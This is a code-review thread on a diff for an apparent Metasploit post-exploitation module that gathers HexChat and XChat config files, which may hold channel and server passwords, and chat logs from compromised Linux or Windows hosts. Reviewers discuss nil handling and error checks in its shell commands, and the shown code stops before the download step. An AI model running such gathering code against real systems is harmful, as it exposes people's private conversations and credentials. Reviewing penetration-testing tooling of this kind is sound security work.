modules/post/multi/gather/enum_hexchat.rb

```diff
@@ -0,0 +1,277 @@
+        'Description' => %q{
+          This module will collect HexChat and XChat's config files and chat logs from the victim's
+          machine.  There are three actions you may choose: CONFIGS, CHATS, and ALL.  The
+          CONFIGS option can be used to collect information such as channel settings,
+          channel/server passwords, etc.  The CHATS option will simply download all the
+          .log files.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['sinn3r', 'h00die'],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Actions' =>
+          [
+            ['CONFIGS', { 'Description' => 'Collect config files' } ],
+            ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
+            ['ALL', { 'Description' => 'Collect both the configs and chat logs' }]
+          ],
+        'DefaultAction' => 'ALL',
+        'References' =>
+          [
+            ['URL', 'https://hexchat.readthedocs.io/en/latest/settings.html']
+          ]
+      )
+    )
+    register_options([
+      OptBool.new('HEXCHAT', [false, 'Enumerate hexchat', true ]),
+      OptBool.new('XCHAT', [false, 'Enumerate xchat', false ])
+    ])
+  end
+
+  def whoami
+    cmd_exec('/usr/bin/whoami').chomp
+  end
+
+  def sep
+    if session.platform == 'windows'
+      return '\\'
+    else
+      return '/'
+    end
+  end
+
+  def get_paths(mode = 'HEXCHAT')
+    paths = []
+    if session.platform == 'windows'
+      appdata = get_env('APPDATA')
+      if mode == 'HEXCHAT'
+        paths << "#{appdata}\\HexChat\\"
+      elsif datastore['XCHAT']
+        paths << "#{appdata}\\X-Chat 2\\"
+      end
+    else
+      user = whoami
+      fail_with(Failure::Unknown, 'Unable to get username.') if user.blank?
+      vprint_status("Detcted username: #{user}")
+
+      if mode == 'HEXCHAT'
+        # https://hexchat.readthedocs.io/en/latest/settings.html
+        paths << "/home/#{user}/.config/hexchat/"
+      elsif mode == 'XCHAT'
+        paths << "/home/#{user}/.xchat2/"
+      end
+    end
+    paths
+  end
+
+  def list_logs(base, mode = 'HEXCHAT')
+    files = []
+    if mode == 'HEXCHAT'
+      # hexchat has a folder for each server
+      # inside each folder, like 'freenode'
+      # are files: sever.log, <server>.log, .log
+      folders = dir base
+      folders.each do |folder|
+        file = dir "#{base}#{sep}#{folder}"
+        file.each do |f|
+          if f.end_with? '.log'
+            files << "#{base}#{sep}#{folder}#{sep}#{f}"
+          end
+        end
+      end
+    elsif mode == 'XCHAT'
+      if session.platform == 'windows'
+        file = dir base
+        file.each do |f|
+          if f.end_with? '.log'
+            files << "#{base}#{sep}#{f}"
+          end
+        end
+
+      else
+        # the original methods written by @sinn3r
+        list = cmd_exec("ls -l #{base}*.log")
+        return [] if list =~ /No such file or directory/
```

Comment:
`cmd_exec` can return `nil` and should be cast `to_s`.

It's better to check if the file is `readable`?, as `No such file or directory` is likely locale dependent, and ignores other errors such as `Permission denied`.

However, all these two lines effectively do is `return []` if there's no log files in the `#{base}` directory, in which case, this might be more intuitive:

```ruby
        list = cmd_exec("ls -l #{base}*.log").to_s
        return [] unless list.include?('.log')
```

Although this is made kind of redundant by the `list.scan` below, which would return an empty Array if no results were found anyway.

Reply:
When did it start returning `nil`? `to_s` is good insurance regardless.

Reply:
Also, IIRC, `=~` can handle `nil`. `match` can't.

Reply:
> 
> 
> Also, IIRC, `=~` can handle `nil`. `match` and `scan` can't. I'd prefer the latter, though. Thanks for that. :-)

Correct, and +1.

Reply:
> 
> 
> When did it start returning `nil`? `to_s` is good insurance regardless.

It has the potential to return `nil` for as long as I can remember.

Reply:
I thought it always returned an output string that could be empty, not `nil`. Hey, I could have misremembered. `to_s` is good stuff.

Reply:
as per the comment, this is the original code, and w/o a solid test env i was hesitant to change it.
However, in retrospect, the paths were included at the bottom.  So I could just manually make them.  Doing that now and will update.